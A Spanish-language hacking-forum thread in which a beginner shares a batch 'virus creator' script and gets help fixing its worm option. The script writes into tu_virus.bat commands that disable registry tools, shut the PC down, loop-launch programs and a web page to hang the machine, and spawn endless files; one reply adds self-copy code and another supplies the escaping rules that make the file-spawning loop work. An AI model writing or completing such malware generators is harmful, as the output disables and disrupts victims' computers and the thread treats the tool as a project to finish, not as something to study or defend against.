Avisos


Resultados 1 al 6 de 6

Tema: Ayuda de nuevo

  1. #1 Ayuda de nuevo 
    Iniciado
    Fecha de ingreso
    Dec 2010
    Ubicación
    Cordoba
    Mensajes
    13
    Descargas
    0
    Uploads
    0
    Gracias por la otra vez pude crear el programa sin problemas pero ahora tengo otro distinto con otro programa...

    Quiero hacer un creador de virus que cuando tu selecciones una opcion en el menu cree un archivo con ese codigo y al seleccionar otro se añada al mismo archivo.

    El problema es que al hacer un worm me aparece el bat pero sin el codigo completo del worm

    yo utilizo este codigo para crear archivos

    if %var%==4 echo :bucle >> tu_virus.bat
    if %var%==4 echo start cmd.exe >> tu_virus.bat
    if %var%==4 echo start calc.exe >> tu_virus.bat
    if %var%==4 echo start notepad.exe >> tu_virus.bat
    if %var%==4 echo goto bucle >> tu_virus.bat

    pero en el worm aparece este problema

    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat

    que es cuando me crea el tu_virus.bat pero el codigo del worm no sale completo solo pone
    :bucle
    worm
    worm
    worm
    goto bucle

    pero tendria que poner en vez de worm %ramdom%.exe

    Gracias!

    Os dejo aqui devajo el codigo completo por si le veis algunos fallo

    @echo off
    title Multifuncion
    color 09
    echo ==================================
    echo = =
    echo = Bienvenido =
    echo = =
    echo ==================================
    echo.
    echo.
    echo Pulse una tecla para entrar en el menu.
    pause>nul


    :Menu
    cls
    echo Seleccione su opcion tecleando el numero respectivo.
    echo.
    echo 1. Creador de virus
    echo 2. ?
    echo 3. Salir
    set /p var=
    if %var%==1 goto :Primero
    if %var%==2 goto :Segundo
    if %var%==3 goto exit
    if %var% GTR 3 echo Error
    goto :Menu

    rimero
    cls
    set Nombre= fabrica de virus
    echo.
    echo En este apartado seleccionara comando por comando la sintaxis del virus

    echo 1. Agregar al registro (para que se abra al encender el PC).Recomendable
    echo 2. Apagar PC
    echo 3. Apagar PCApagar PC en 500 seg
    echo 4. Bucle (se colgara la PC)
    echo 5. Bucle de pagina web
    echo 6. salir
    set /p var=
    if %var%==1 echo reg add HKEY_current_user\software\microsoft\windows\curre ntversion\policies\system /v DisableRegistryTools /t reg_dword /d 00000001 >> tu_virus.bat
    if %var%==2 echo shutdown -s -t0 >> tu_virus.bat
    if %var%==3 echo shutodwon -s -t500 >> tu_virus.bat
    if %var%==4 echo :bucle >> tu_virus.bat
    if %var%==4 echo start cmd.exe >> tu_virus.bat
    if %var%==4 echo start calc.exe >> tu_virus.bat
    if %var%==4 echo start notepad.exe >> tu_virus.bat
    if %var%==4 echo goto bucle >> tu_virus.bat
    if %var%==5 echo :bucle >> tu_virus.bat
    if %var%==5 echo start http://www.youtube.com/jerotinoco >> tu_virus.bat
    if %var%==5 echo start http://www.youtube.com/jerotinoco >> tu_virus.bat
    if %var%==5 echo start http://www.youtube.com/jerotinoco >> tu_virus.bat
    if %var%==5 echo goto bucle >> tu_virus.bat
    if %var%==6 echo :bucle >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo goto bucle >> tu_virus.bat

    goto rimero
    Hay 10 tipos de personas el mundo: aquellas que entienden los binarios y las que no
    Citar  
     

  2. #2  
    Co-Admin HackHispano.com
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.621
    Descargas
    30
    Uploads
    8
    NO hagas encuestas chorras, plantea tu duda y listo.
    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Dec 2010
    Ubicación
    Cordoba
    Mensajes
    13
    Descargas
    0
    Uploads
    0
    ya esque me equivoque me pense que saldria de otra forma y no pude borrarlo
    Hay 10 tipos de personas el mundo: aquellas que entienden los binarios y las que no
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    Si quieres copiarte a ti mismo solo tienes que hacer esto copy %0 "%homedrive%\word.bat" ademas creo que no entiendes el concepto de gusano o worn

    http://es.wikipedia.org/wiki/Gusano_inform%C3%A1tico
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

  5. #5  
    Iniciado
    Fecha de ingreso
    Dec 2010
    Ubicación
    Cordoba
    Mensajes
    13
    Descargas
    0
    Uploads
    0
    se que ese no es el codigode un worm pero es un bucle que crear archivos exe por que si pongo el codigo de worm salta el antivirus si no lo protejo
    y no quiero copiarme a mi mismo lo que quiero es que el codigo del "gusano"
    :bucle >> tu_virus.bat
    worm >> %ramdom%.exe
    worm >> %ramdom%.exe
    worm >> %ramdom%.exe
    goto :bucle

    quiero que aparezca ese codigo dentro de un archivo.bat no que cree un exe sino que ponga ese codigo en un bat que al ejecutarlo se creen infinitos archivos que seria este codigo

    if %var%==6 echo :bucle >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo worm >> %ramdom%.exe >> tu_virus.bat
    if %var%==6 echo goto bucle >> tu_virus.bat

    que al pulsar 6 se cre un archivo bat con lo que te e dicho antes pero como esta el signo >> en worm >> %ramdom%.exe me crea un exe
    Hay 10 tipos de personas el mundo: aquellas que entienden los binarios y las que no
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Oct 2010
    Mensajes
    401
    Descargas
    24
    Uploads
    0
    El problema es que para pasar caracteres como % por tuberias en MS-DOS, hay que hacerlo de otro modo en este caso seria asi %%random%% para pasar el caracter %, y para pasar el signo >> seria ^> por cada > ok, bueno aqui te dejo algo.


    % = %%
    ^ = ^^
    | = ^|
    > = ^>
    < = ^<
    & = ^&

    Sige trabajando.
    René Pérez Joglar: Pa' tener a un listo que no dice nada prefiero a un idiota que hable mucho.
    Citar  
     

Etiquetas para este tema

Ver nube de etiquetas

Marcadores
Marcadores
Permisos de publicación
  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •